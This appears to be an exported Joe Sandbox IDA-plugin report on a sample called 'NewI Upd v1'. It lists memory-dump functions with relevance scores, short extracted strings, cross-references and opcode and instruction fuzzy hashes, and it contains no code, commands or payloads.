Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: wvut$wvut$wvut
API String ID: 2994545307-3074886881
Opcode ID: 5c019b9a9ca5a893a06876414274bfdd37aa5a83e5194ea0942ee35147ee6746
Instruction ID: 1898a828a52fa49311f9c07b435a1659977d725a1da0b34424c7eded9574b34e
Opcode Fuzzy Hash: 5c019b9a9ca5a893a06876414274bfdd37aa5a83e5194ea0942ee35147ee6746
Instruction Fuzzy Hash: 899146746083808BD7218F28D8517BBB7E1FB97714F69496EE0D1872A2D338D846CB5E

Function 0042DD7A Relevance: 4.0, Strings: 3, Instructions: 241COMMON

Download Yara Rule

Strings

0, xrefs: 0042E032
d, xrefs: 0042DFEA
`, xrefs: 0042E088

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: 0$`$d
API String ID: 0-3149133877
Opcode ID: 327f764bed8b414ef3aae06928a86adb3bbf14444a7562aeff172efefa358fe2
Instruction ID: bc5a30899cd1ac2ea5f0827a67a6c3a5ff877c5f629a46ba498f7c849a4ed348
Opcode Fuzzy Hash: 327f764bed8b414ef3aae06928a86adb3bbf14444a7562aeff172efefa358fe2
Instruction Fuzzy Hash: C761497060C3A18AD318CF3A906037BBBD19F97304F68499EE4D65B382D678850ACB5A

Function 00423FA0 Relevance: 4.0, Strings: 3, Instructions: 240COMMON

Download Yara Rule

Strings

nH5N, xrefs: 00423FCA
pv, xrefs: 00423FDA
;L%r, xrefs: 00423FD2

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: ;L%r$nH5N$pv
API String ID: 0-2305982310
Opcode ID: f916a31feec9d117aebf4ecdbf7a0431857c15a978ebd95656e9105597c739a3
Instruction ID: fa0b2261c632a5574deb59fb9159a3d735b0dfae2ba5e589e8e6734cd6fd1b9d
Opcode Fuzzy Hash: f916a31feec9d117aebf4ecdbf7a0431857c15a978ebd95656e9105597c739a3
Instruction Fuzzy Hash: 518121B56083509FD710CF29EC41B1FBBE4EBC6708F10893DF6958B292D7B598068B96

Function 0042C70E Relevance: 3.9, Strings: 3, Instructions: 155COMMON

Download Yara Rule

Strings

SASt, xrefs: 0042C806
P]QS, xrefs: 0042C7FB
gD, xrefs: 0042C76D

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: P]QS$SASt$gD
API String ID: 0-3174026959
Opcode ID: cefc74df0e0f066db206dc3c0e4c39cc37c9e46bc34327a153f47081787d54a0
Instruction ID: c28a202f587ec16e009b00e7c69291f09ef52edc57822ed0e848e46b2ba359d6
Opcode Fuzzy Hash: cefc74df0e0f066db206dc3c0e4c39cc37c9e46bc34327a153f47081787d54a0
Instruction Fuzzy Hash: F541F87550C3D28BD73A8B3594903EBBBE2AFD3304F984A6DC4CA87242D77549068B96

Function 00404CC0 Relevance: 3.3, Strings: 2, Instructions: 821COMMON

Download Yara Rule

Strings

0, xrefs: 00405614
8, xrefs: 0040560C

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 3a9da05610ec6d3262ba8e173cb4be23741fd7a65ccff4179dae55f38c533d94
Instruction ID: a4bf287998477d3b7fc9c420b329fb203cb69bbd486473c754fba68af0c0fb07
Opcode Fuzzy Hash: 3a9da05610ec6d3262ba8e173cb4be23741fd7a65ccff4179dae55f38c533d94
Instruction Fuzzy Hash: B27213716083419FD714CF18C880BABBBE1EF98354F44892EF9889B391D379D958CB96

Function 0043E9C0 Relevance: 3.1, Strings: 2, Instructions: 643COMMON

Download Yara Rule

Strings

"C, xrefs: 0043ED14
C, xrefs: 0043ECB1

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: "C$C
API String ID: 0-3280760416
Opcode ID: 503ae06d275f9ea771ff5cd1916f22ba340de29ab040fb8c4047987e8c3f9719
Instruction ID: cd89b3fd629672fa1571d7b17b21a5cbdd63ac3e17189e76c0613c85b494ac19
Opcode Fuzzy Hash: 503ae06d275f9ea771ff5cd1916f22ba340de29ab040fb8c4047987e8c3f9719
Instruction Fuzzy Hash: D102F23AA19211CFC708DF39E89026EB3E2FF8A315F1A887DD54687391DA35D951CB44

Function 0043EAD0 Relevance: 3.0, Strings: 2, Instructions: 526COMMON

Download Yara Rule

Strings

"C, xrefs: 0043ED14
C, xrefs: 0043ECB1

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: "C$C
API String ID: 0-3280760416
Opcode ID: 5c2a19dce4ae3f6ec4ddad7712c59ad73c46217f638aa72e646372b53db2f06c
Instruction ID: 19cf82352f041d290a8d14a5c896b4878a3885560b92750522dede50401a9c75
Opcode Fuzzy Hash: 5c2a19dce4ae3f6ec4ddad7712c59ad73c46217f638aa72e646372b53db2f06c
Instruction Fuzzy Hash: 12E1EF35A19211CFD708CF39E89066EB3E2FF8A315F29897DD946C7391DA35A812CB44

Function 0043EAEB Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

"C, xrefs: 0043ED14
C, xrefs: 0043ECB1

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: "C$C
API String ID: 0-3280760416
Opcode ID: ecdb325423ac55c84fec48696448e1d0a356791bd3c6c5e9599457136b64d6e5
Instruction ID: 2fd194cf2a14ae3cfe377aa5088590360eeca6a8a0a76d3cd9eccbbf85dc4b11
Opcode Fuzzy Hash: ecdb325423ac55c84fec48696448e1d0a356791bd3c6c5e9599457136b64d6e5
Instruction Fuzzy Hash: B8E1DF35A19211CFD708CF38E89066AB3E2FF8A315F29897DD946C73A1DA359852CB44

Function 0043EAE9 Relevance: 3.0, Strings: 2, Instructions: 514COMMON

Download Yara Rule

Strings

"C, xrefs: 0043ED14
C, xrefs: 0043ECB1

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: "C$C
API String ID: 0-3280760416
Opcode ID: 91ae3453b6c735845d176e0f23d2e2f470d0be351050557d3157a078a4fd1db7
Instruction ID: f02b1ff8551042f8f0d3d7b477be9611a0440110b5a3ea50c25e0084f054dd97
Opcode Fuzzy Hash: 91ae3453b6c735845d176e0f23d2e2f470d0be351050557d3157a078a4fd1db7
Instruction Fuzzy Hash: A0E1DF35A19211CFD708CF38E89066AB3E2FF8A315F29897DD946C7391DA35A852CB44

Function 0040B1A0 Relevance: 3.0, Strings: 2, Instructions: 477COMMON

Download Yara Rule

Strings

*B, xrefs: 0040B3CC
B\, xrefs: 0040B3D6

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: *B$B\
API String ID: 0-2416219933
Opcode ID: 62785173a8e96d184975ace2cadf92f17ff55e9c24de48d70f6e06eca60eb51c
Instruction ID: 70e465a276e921f5eba97a0febf5e5257a151e30790d8365e6f8ea29c59f0f30
Opcode Fuzzy Hash: 62785173a8e96d184975ace2cadf92f17ff55e9c24de48d70f6e06eca60eb51c
Instruction Fuzzy Hash: 38028BB5201B00CFD320CF65D881797BBE5FB8A314F158A2CD5AA8BAA0DB78E415CF44

Function 00631010 Relevance: 2.9, Strings: 2, Instructions: 437COMMON

Download Yara Rule

Strings

4, xrefs: 006313D6
Huj, xrefs: 00631461, 0063146E, 00631654

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: Huj$4
API String ID: 0-293128752
Opcode ID: 713eb20c01adaa876c3186acd72ace72bf4b92227f61b9941624ae86bd4f93d8
Instruction ID: 98c59e9e221b4cd6c9b6566c43976b4fb407f85820a7085ac1e6f85be6b32511
Opcode Fuzzy Hash: 713eb20c01adaa876c3186acd72ace72bf4b92227f61b9941624ae86bd4f93d8
Instruction Fuzzy Hash: E002D276D002598BCB04CFA9EC911F9BBF1FB25310F14427BD585EB6A2D2385A49CF90

Function 0043EC00 Relevance: 2.9, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

"C, xrefs: 0043ED14
C, xrefs: 0043ECB1

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: "C$C
API String ID: 0-3280760416
Opcode ID: 940f9eefb915b395852d11166c2c4e4a3dea2e48452b1afac266c367f5fd9f65
Instruction ID: 62567f5fd6b88efbf8cfe28a01216544a636f1ecfec08ae6daf5c0f9d5e13889
Opcode Fuzzy Hash: 940f9eefb915b395852d11166c2c4e4a3dea2e48452b1afac266c367f5fd9f65
Instruction Fuzzy Hash: 4EC1AC35A19211CFC708CF28E89066EB3E1FF8A315F29487DE946D3391DA34E951CB48

Function 0043EC90 Relevance: 2.9, Strings: 2, Instructions: 392COMMON

Download Yara Rule

Strings

"C, xrefs: 0043ED14
C, xrefs: 0043ECB1

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: "C$C
API String ID: 0-3280760416
Opcode ID: 15dd857cfb34e2a4448609af40a1b066ca4c2b80d2dd1f1210af48633cadd495
Instruction ID: 573bc7df54585fadcc4178bd22ddd5ab2f3196576f66d1a2dac80d994cece683
Opcode Fuzzy Hash: 15dd857cfb34e2a4448609af40a1b066ca4c2b80d2dd1f1210af48633cadd495
Instruction Fuzzy Hash: 45B1BD36619215CFCB08CF28E89056EB7E1FF8A314F29497DE846D3391DA34E912CB48

Function 0040AD10 Relevance: 2.9, Strings: 2, Instructions: 382COMMON

Download Yara Rule

Strings

m, xrefs: 0040AD2E
ZQ, xrefs: 0040AF41

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: ZQ$m
API String ID: 0-711034910
Opcode ID: 9e371e26be4fef75f5bbb8b1e1baa8cbc04de3a08d6c016dd065ba474575a381
Instruction ID: 53dd41cb2cc7bfb3d5bc51f3345dabef14682e883a696b366eb86497e9f33037
Opcode Fuzzy Hash: 9e371e26be4fef75f5bbb8b1e1baa8cbc04de3a08d6c016dd065ba474575a381
Instruction Fuzzy Hash: 45B1E27524C3548BD324EF64985126BFBE3DBD1344F18893EE8D55F382D7B988068B8A

Function 00426970 Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

wvut, xrefs: 00426BFF
wvut, xrefs: 00426B7F

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: wvut$wvut
API String ID: 0-2715987819
Opcode ID: fa3b9ff65f3bf5bb3487533ccf0739dcd5e83207079d66cfbd223be60efa5b2a
Instruction ID: 8dfb649525bbee4168a8c32cc8855b4619354e94a617eb3043ec49613718b502
Opcode Fuzzy Hash: fa3b9ff65f3bf5bb3487533ccf0739dcd5e83207079d66cfbd223be60efa5b2a
Instruction Fuzzy Hash: DCB11475E00265DFDB108FA8EC817AFB7B4FB4A304F16007AE544AB291DB389D41CB99

Function 00417BE8 Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

;, xrefs: 00417F3D
wvut, xrefs: 00417C25

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: ;$wvut
API String ID: 0-1217031000
Opcode ID: f441175fd61169934331ccc115507fe38122b37d60c349e235377196d86b166d
Instruction ID: dbf65eeee59a3afd9361847c55408fd9b7f0d9b54969a025a9e851b76f7af293
Opcode Fuzzy Hash: f441175fd61169934331ccc115507fe38122b37d60c349e235377196d86b166d
Instruction Fuzzy Hash: 51C1D27460C3409FD7288B249842BFBB7F2FB89304F24897DE58597352D7399D428B8A

Function 00404390 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 00404781
), xrefs: 0040440B

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 80203673ff6ef886075ca40d4058ab80b126ef9aebbbe3ed10cc2fb01c205e0a
Instruction ID: 1ea9d5fc32c20fc02e032da2d4c304d9da46f869dc4882b2df8c43420e1158b5
Opcode Fuzzy Hash: 80203673ff6ef886075ca40d4058ab80b126ef9aebbbe3ed10cc2fb01c205e0a
Instruction Fuzzy Hash: 5AD1D1B15083449FD710DF14D841B5BBBE4ABD5308F14492EFA98AB3C2D779D908CB96

Function 00426D90 Relevance: 2.8, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

wvut, xrefs: 00426BFF
wvut, xrefs: 00426B7F

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: wvut$wvut
API String ID: 0-2715987819
Opcode ID: 5d152ac7f58ca66de897dd2323dda275e0eea79a11dde98410abd149c215d385
Instruction ID: 91ba81a365acf588eb161e0c31f7b49f183479047e77c4367a1d3feac9479522
Opcode Fuzzy Hash: 5d152ac7f58ca66de897dd2323dda275e0eea79a11dde98410abd149c215d385
Instruction Fuzzy Hash: BB912575E00265CFDB148FA8EC816AEB7B0FB4A304F16007AD545AB391DB389D42CB99

Function 0042DEA3 Relevance: 2.8, Strings: 2, Instructions: 262COMMON

Download Yara Rule

Strings

d, xrefs: 0042DFEA
`, xrefs: 0042E088

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: `$d
API String ID: 0-211900117
Opcode ID: 402653c375be057a24b8ddc8e645a559e9dd7c3eefc18441dc9f98842947dbeb
Instruction ID: b59294d9c1a15fa909a05ffb8caf6bf8d31ea6564f3e8878637a277ecda5345c
Opcode Fuzzy Hash: 402653c375be057a24b8ddc8e645a559e9dd7c3eefc18441dc9f98842947dbeb
Instruction Fuzzy Hash: A8713E7060C3A18BD718CF3A9061337BBD09F97314F68495EE4D69B382D679C50ACB5A

Function 0042DE1E Relevance: 2.8, Strings: 2, Instructions: 261COMMON

Download Yara Rule

Strings

d, xrefs: 0042DFEA
`, xrefs: 0042E088

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: `$d
API String ID: 0-211900117
Opcode ID: fd8e58c38395d7707d589fcef5b3f70413f735475b088cd4b8b72dde630ee84f
Instruction ID: 870c4b68d944e8b6be36c511a114e621168382bd5957720ace9513f1f3ecc1aa
Opcode Fuzzy Hash: fd8e58c38395d7707d589fcef5b3f70413f735475b088cd4b8b72dde630ee84f
Instruction Fuzzy Hash: 3571607060C3A18BD718CF399061337BBD09F97314F68495EE4D69B382D679C90ACB5A

Function 0042DE8A Relevance: 2.7, Strings: 2, Instructions: 236COMMON

Download Yara Rule

Strings

d, xrefs: 0042DFEA
`, xrefs: 0042E088

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: `$d
API String ID: 0-211900117
Opcode ID: 235015f4e5ef938169629bcf23e5b61c92dd813a814395d21ce06f3e0bfc5011
Instruction ID: 22cc976c6e4e1f58d6992f61751e0bf2ac1064a9de32c25a95527ca197daca6d
Opcode Fuzzy Hash: 235015f4e5ef938169629bcf23e5b61c92dd813a814395d21ce06f3e0bfc5011
Instruction Fuzzy Hash: FA51397060C3A18BD318CF3A9060377BBD19F97314F68499EE4D65B282D678890ACB5A

Function 00429ED0 Relevance: 2.6, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

6K%E, xrefs: 00429EEA
s7m, xrefs: 00429F1A

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: 6K%E$s7m
API String ID: 0-818221315
Opcode ID: e357db905aa0807865a35f0e2cbf2d9d71dd9cb62c18211750eed3ff664054f7
Instruction ID: 10a9034e3de6b88d1c8796159a6682f4b5e4724ed6008898e1fa256ed9b2554c
Opcode Fuzzy Hash: e357db905aa0807865a35f0e2cbf2d9d71dd9cb62c18211750eed3ff664054f7
Instruction Fuzzy Hash: C8412876A087548FE310CF65AC8175FFBB2EBC5704F15893DE9C4AB385DAB488018B86

Function 0041723C Relevance: 2.0, Strings: 1, Instructions: 740COMMON

Download Yara Rule

Strings

U1b3, xrefs: 0041735F

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: U1b3
API String ID: 0-270911256
Opcode ID: cb51c93c03e5505ab779ec242187b890a5dc6f62ccdaab6256764171c4962d4a
Instruction ID: 1f59270be91c0502b57aaff0ae66bcab994d532a83e2253d9ab2ce2eeae932f7
Opcode Fuzzy Hash: cb51c93c03e5505ab779ec242187b890a5dc6f62ccdaab6256764171c4962d4a
